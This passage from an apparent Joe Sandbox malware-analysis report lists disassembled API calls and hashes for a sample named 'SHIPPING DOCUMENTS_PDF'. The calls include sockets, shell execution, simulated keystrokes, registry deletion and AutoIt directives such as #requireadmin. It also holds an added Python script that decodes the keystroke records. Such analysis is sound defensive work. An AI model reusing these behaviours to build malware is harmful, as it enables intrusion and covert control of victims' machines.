                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00BC6C00
                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BC6C21
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC6C34
                                                                                    • htons.WSOCK32(?), ref: 00BC6CEA
                                                                                    • inet_ntoa.WSOCK32(?), ref: 00BC6CA7
                                                                                      • Part of subcall function 00BAA7E9: _strlen.LIBCMT ref: 00BAA7F3
                                                                                      • Part of subcall function 00BAA7E9: _memmove.LIBCMT ref: 00BAA815
                                                                                    • _strlen.LIBCMT ref: 00BC6D44
                                                                                    • _memmove.LIBCMT ref: 00BC6DAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 3619996494-0
                                                                                    • Opcode ID: d157df0ff9377a1dc7eb16005d16188e11d48cda458d70f27725e0426027107e
                                                                                    • Instruction ID: 433bfdc74c12be102462d37a90cfcad9a6b5e07748f2c6317b605d096bf1c2e6
                                                                                    • Opcode Fuzzy Hash: d157df0ff9377a1dc7eb16005d16188e11d48cda458d70f27725e0426027107e
                                                                                    • Instruction Fuzzy Hash: 6181A071208300ABD710EB24CC96F6AB7E8EF84714F1449ADF9569B2E2DB70DD05CB62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2e604f0e3fd85da4e6adbfd466010a07f93b6798e7be2d3f8387d6bed3311909
                                                                                    • Instruction ID: 31349031bf218e576fdf863db0cd4d532f5827a5a06894e70f0980a4d669c65d
                                                                                    • Opcode Fuzzy Hash: 2e604f0e3fd85da4e6adbfd466010a07f93b6798e7be2d3f8387d6bed3311909
                                                                                    • Instruction Fuzzy Hash: 4A716734901109EFCB049F98CC89FBEBBB9FF85311F148599E916AB251D730AA15CFA4
                                                                                    APIs
                                                                                    • IsWindow.USER32(00D552E0), ref: 00BDB3EB
                                                                                    • IsWindowEnabled.USER32(00D552E0), ref: 00BDB3F7
                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BDB4DB
                                                                                    • SendMessageW.USER32(00D552E0,000000B0,?,?), ref: 00BDB512
                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00BDB54F
                                                                                    • GetWindowLongW.USER32(00D552E0,000000EC), ref: 00BDB571
                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BDB589
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                    • String ID:
                                                                                    • API String ID: 4072528602-0
                                                                                    • Opcode ID: cbf514c8ece1f3057e96e5fc0513b3f80131cb47b980576147ad49dbd3b5c18e
                                                                                    • Instruction ID: c6be3d1cce2d41069dcd5b7f4d45ac0a43607b947e9b5e9c17488becd6f784f7
                                                                                    • Opcode Fuzzy Hash: cbf514c8ece1f3057e96e5fc0513b3f80131cb47b980576147ad49dbd3b5c18e
                                                                                    • Instruction Fuzzy Hash: 3271AB34605204EFDB21DF54C8A0FBAFBE9EF4A310F15809AE946973A2E731A940DB54
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BCF448
                                                                                    • _memset.LIBCMT ref: 00BCF511
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00BCF556
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                      • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00BCF5CD
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BCF5FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                    • String ID: @
                                                                                    • API String ID: 3522835683-2766056989
                                                                                    • Opcode ID: e4614b8c38935406f6557d3a2b9861702917ff75c0509d4c83ce8d6a12804142
                                                                                    • Instruction ID: c0b4cffb1eb7b2d52941c3b529eb73159014e9ac9d2a368a7d9f24cf754d9e2c
                                                                                    • Opcode Fuzzy Hash: e4614b8c38935406f6557d3a2b9861702917ff75c0509d4c83ce8d6a12804142
                                                                                    • Instruction Fuzzy Hash: 91614D75A0061ADFCB14EF64C891AAEBBF5FF49310F1480E9E859AB351CB30AD45CB94
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 00BB0F8C
                                                                                    • GetKeyboardState.USER32(?), ref: 00BB0FA1
                                                                                    • SetKeyboardState.USER32(?), ref: 00BB1002
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BB1030
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BB104F
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BB1095
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BB10B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 2e2ba70bf6ddba93b79906c9fe52a5f8a27e4d9b7ebf2fa3b0d30386695719db
                                                                                    • Instruction ID: be495988ebda31f124995857444d65172b9dcf9e0d419ded5810f03ca79939b9
                                                                                    • Opcode Fuzzy Hash: 2e2ba70bf6ddba93b79906c9fe52a5f8a27e4d9b7ebf2fa3b0d30386695719db
                                                                                    • Instruction Fuzzy Hash: B351F1606186D53FFB3652388C25BFABEE9DB06304F4889C9E1D5968C2C2D8DCC4D751
                                                                                    APIs
                                                                                    • GetParent.USER32(00000000), ref: 00BB0DA5
                                                                                    • GetKeyboardState.USER32(?), ref: 00BB0DBA
                                                                                    • SetKeyboardState.USER32(?), ref: 00BB0E1B
                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BB0E47
                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BB0E64
                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BB0EA8
                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BB0EC9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: fb9cb1994bc50dd47b6bd15be8a30795ccc14f8920695abe7cd36b9caa30fac9
                                                                                    • Instruction ID: b9f968ba8fdb896456753bb4bb81b65a448379ac7cad453febe58552f62e2b36
                                                                                    • Opcode Fuzzy Hash: fb9cb1994bc50dd47b6bd15be8a30795ccc14f8920695abe7cd36b9caa30fac9
                                                                                    • Instruction Fuzzy Hash: 8B51E3A09286D63EFB3266648855BFBBEE99B06300F0888C9E1D5468C2D3D5EC94D750
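The two records above list PostMessageW calls only as raw hex arguments. The following script is an added example (not part of the Joe Sandbox report or its IDA plugin output) that parses API-call lines in the report's own "• Func.Module(args), ref: addr" format and maps the message and wParam values to their documented Win32 names: 0x100 is WM_KEYDOWN, 0x101 is WM_KEYUP, and wParam values 0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN. The sample input is copied from the records above; reading these functions as the modifier press/release half of a keystroke-sending routine, which fits the report's "compiled AutoIt script" signature, is the editor's inference, not a finding stated by the report.

```python
"""Decode PostMessageW keystroke records from a Joe Sandbox API listing.

Added example; not code from the sandbox report. The constant tables hold
documented Win32 values from winuser.h, the sample lines are copied from the
report's own records, and the helper names are the author's choice.
"""
import re

# Documented Win32 constants (winuser.h).
WINDOW_MESSAGES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# Constructed input: lines copied from the two records above, in the report's format.
SAMPLE_LINES = """\
• GetParent.USER32(00000000), ref: 00BB0DA5
• GetKeyboardState.USER32(?), ref: 00BB0DBA
• SetKeyboardState.USER32(?), ref: 00BB0E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BB0E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BB0E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BB0EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BB0EC9
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00BB1030
"""

# "• Func.Module(arg,arg,...), ref: ADDR"; args may be hex or the report's '?' placeholder.
API_LINE = re.compile(
    r"•\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_line(line):
    """Return (func, module, [args], ref) for an API record line, or None otherwise."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw_args = m.group("args")
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    return m.group("func"), m.group("module"), args, m.group("ref")


def _name(table, raw):
    """Map a hex argument to a constant name; keep '?' and unknown values readable."""
    try:
        value = int(raw, 16)
    except ValueError:
        return raw
    return table.get(value, f"0x{value:X}")


def decode_post_message(args):
    """Decode PostMessageW(hwnd, msg, wParam, lParam) into (message name, key name)."""
    msg, wparam = (args + ["?"] * 4)[1:3]
    return _name(WINDOW_MESSAGES, msg), _name(VIRTUAL_KEYS, wparam)


def keystroke_events(text):
    """Return [(ref, message_name, key_name)] for every PostMessageW record in text."""
    events = []
    for line in text.splitlines():
        parsed = parse_api_line(line)
        if parsed is None or parsed[0] != "PostMessageW":
            continue
        _func, _module, args, ref = parsed
        msg, key = decode_post_message(args)
        events.append((ref, msg, key))
    return events


def modifier_keys_touched(events):
    """Set of modifier-key names that the record presses or releases."""
    return {key for _, _, key in events if key in VIRTUAL_KEYS.values()}


if __name__ == "__main__":
    for ref, msg, key in keystroke_events(SAMPLE_LINES):
        print(f"{ref}: PostMessageW {msg} {key}")
    print("modifiers:", sorted(modifier_keys_touched(keystroke_events(SAMPLE_LINES))))
```

The same parser can be pointed at any "APIs" block in this report; only the two constant tables are specific to the keystroke records, and an unknown message or key value is printed as hex rather than silently dropped.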
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 2945705084-0
                                                                                    • Opcode ID: 6e012f3b3e8b819db34ca5e173bdae881f7be7f56a0ed907bfb84cbbdd0e9ed1
                                                                                    • Instruction ID: 325e347a746706c763f58740923263ac5d26590f6f523c0e286005c31e4c1110
                                                                                    • Opcode Fuzzy Hash: 6e012f3b3e8b819db34ca5e173bdae881f7be7f56a0ed907bfb84cbbdd0e9ed1
                                                                                    • Instruction Fuzzy Hash: 19419365C1061476CB11EBB48C86ADFB3FC9F04310F50C9A6E52DE3221FB74A655C7AA
                                                                                    APIs
                                                                                      • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BB3697,?), ref: 00BB468B
                                                                                      • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BB3697,?), ref: 00BB46A4
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00BB36B7
                                                                                    • _wcscmp.LIBCMT ref: 00BB36D3
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00BB36EB
                                                                                    • _wcscat.LIBCMT ref: 00BB3733
                                                                                    • SHFileOperationW.SHELL32(?), ref: 00BB379F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1377345388-1173974218
                                                                                    • Opcode ID: c9e05e6b40822294fae68a94cfd8468ca6187d38b7c108c5ade6b46258ac3666
                                                                                    • Instruction ID: 81bbbd0a6ab3e973f586ad8948192c6ea9a804f7b25b267e07f56bb40caa97c5
                                                                                    • Opcode Fuzzy Hash: c9e05e6b40822294fae68a94cfd8468ca6187d38b7c108c5ade6b46258ac3666
                                                                                    • Instruction Fuzzy Hash: 31416E7150C344ABC751EF64C451AEFB7E8EF89780F0008AEB49AC3251EB75D689C752
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BD72AA
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD7351
                                                                                    • IsMenu.USER32(?), ref: 00BD7369
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD73B1
                                                                                    • DrawMenuBar.USER32 ref: 00BD73C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 3866635326-4108050209
                                                                                    • Opcode ID: e15077e76c61787ddd98631213bf8b3e91db14375f50b1894df39eba58814e4c
                                                                                    • Instruction ID: 7c8740a8079c0afba7cdc8abd8af2ef53c24e2cccb79cfbf200087ae21b52cc9
                                                                                    • Opcode Fuzzy Hash: e15077e76c61787ddd98631213bf8b3e91db14375f50b1894df39eba58814e4c
                                                                                    • Instruction Fuzzy Hash: CE414675A44209EFDB20DF50D884AEABBF8FB05324F1480AAFD0597350EB30AD41DB50
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BD0FD4
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD0FFE
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00BD10B5
                                                                                      • Part of subcall function 00BD0FA5: RegCloseKey.ADVAPI32(?), ref: 00BD101B
                                                                                      • Part of subcall function 00BD0FA5: FreeLibrary.KERNEL32(?), ref: 00BD106D
                                                                                      • Part of subcall function 00BD0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BD1090
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BD1058
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                    • String ID:
                                                                                    • API String ID: 395352322-0
                                                                                    • Opcode ID: a4e53ee8ec877378ebe64fee81d9d7dff4e8f1dac65b85f784e673ad0c1f2f11
                                                                                    • Instruction ID: 57899ea33dcd88a3855f36bc5d09bc71557dd39f7aee35602385e4960ec6be23
                                                                                    • Opcode Fuzzy Hash: a4e53ee8ec877378ebe64fee81d9d7dff4e8f1dac65b85f784e673ad0c1f2f11
                                                                                    • Instruction Fuzzy Hash: E9311B71901109BFDB15AF94DC99AFFF7BCEF08300F1045AAE512E3241EA749E859BA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BD62EC
                                                                                    • GetWindowLongW.USER32(00D552E0,000000F0), ref: 00BD631F
                                                                                    • GetWindowLongW.USER32(00D552E0,000000F0), ref: 00BD6354
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BD6386
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BD63B0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00BD63C1
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BD63DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 0cdbf995a83d0dbeda71f1ff3199adf1fb59c220f91831d258889ff3688430f2
                                                                                    • Instruction ID: 2eb160856e515153fbe271aa3c3fae70c8737c8d3fa0e78928fa5001d6f6265d
                                                                                    • Instruction Fuzzy Hash: B231F030644251EFEB20CF5CDC84F68BBE1FB5A724F1941A6F5018B2B2EB71A840DB54
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADB2E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADB54
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00BADB57
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00BADB75
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00BADB7E
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00BADBA3
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00BADBB1
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 2e720a59149f91dfdbe08bffa5085f7f84f8615af90d09d3aac1f752b539bb74
                                                                                    • Instruction ID: 9ef745d3364a93069a6f7367d29df0f00425115586eb5aae76e6c701b5c9b178
                                                                                    • Instruction Fuzzy Hash: 6B21A736609219AFDF10DFA8DC84CBB77ECEB09360B458566F916DB250EA70DC418BB0
                                                                                    APIs
                                                                                      • Part of subcall function 00BC7D8B: inet_addr.WSOCK32(00000000), ref: 00BC7DB6
                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00BC61C6
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC61D5
                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BC620E
                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00BC6217
                                                                                    • WSAGetLastError.WSOCK32 ref: 00BC6221
                                                                                    • closesocket.WSOCK32(00000000), ref: 00BC624A
                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BC6263
                                                                                    Similarity
                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 910771015-0
                                                                                    • Opcode ID: b6046678d95fe47423da856f5048d5e351418960eb22b56a3553c7238ce26669
                                                                                    • Instruction ID: b4228cd161dbc4249e94f19292177a9e210a6ae10d61459673ae8db7f28addeb
                                                                                    • Instruction Fuzzy Hash: 00317071604118ABDF10AF64CC85FBAB7E9EF45751F0440ADFD06AB291DB70AD049AA1
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 1038674560-2734436370
                                                                                    • Opcode ID: 8e447f03bed8a389453ed689191774e3279fe1fda89424080eab923164d2aad7
                                                                                    • Instruction ID: 2a78f73e9c63b105f414ea306bb2a712d365d4ec06a9ad1e21b68433ab9669e0
                                                                                    • Instruction Fuzzy Hash: CE2134722086127AD220AB78AC02EF773DCEF5A740F1484BAF85A860A1EB509D81D395
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADC09
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADC2F
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00BADC32
                                                                                    • SysAllocString.OLEAUT32 ref: 00BADC53
                                                                                    • SysFreeString.OLEAUT32 ref: 00BADC5C
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00BADC76
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00BADC84
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 0b09a8518d0b73fadcfbae17984c9ebd3cb1d785169e5c472a4cd4bd424391af
                                                                                    • Instruction ID: bab932414a9f8dbb026fa119a0ac5cf441280d4a6e889c584923d8636a01a1e2
                                                                                    • Instruction Fuzzy Hash: D1217935609105BF9B10DFA8DC88DBB77ECEB093607508166F916CB660EA70DC41CB64
                                                                                    APIs
                                                                                      • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                                                      • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                                                      • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BD7632
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BD763F
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BD764A
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BD7659
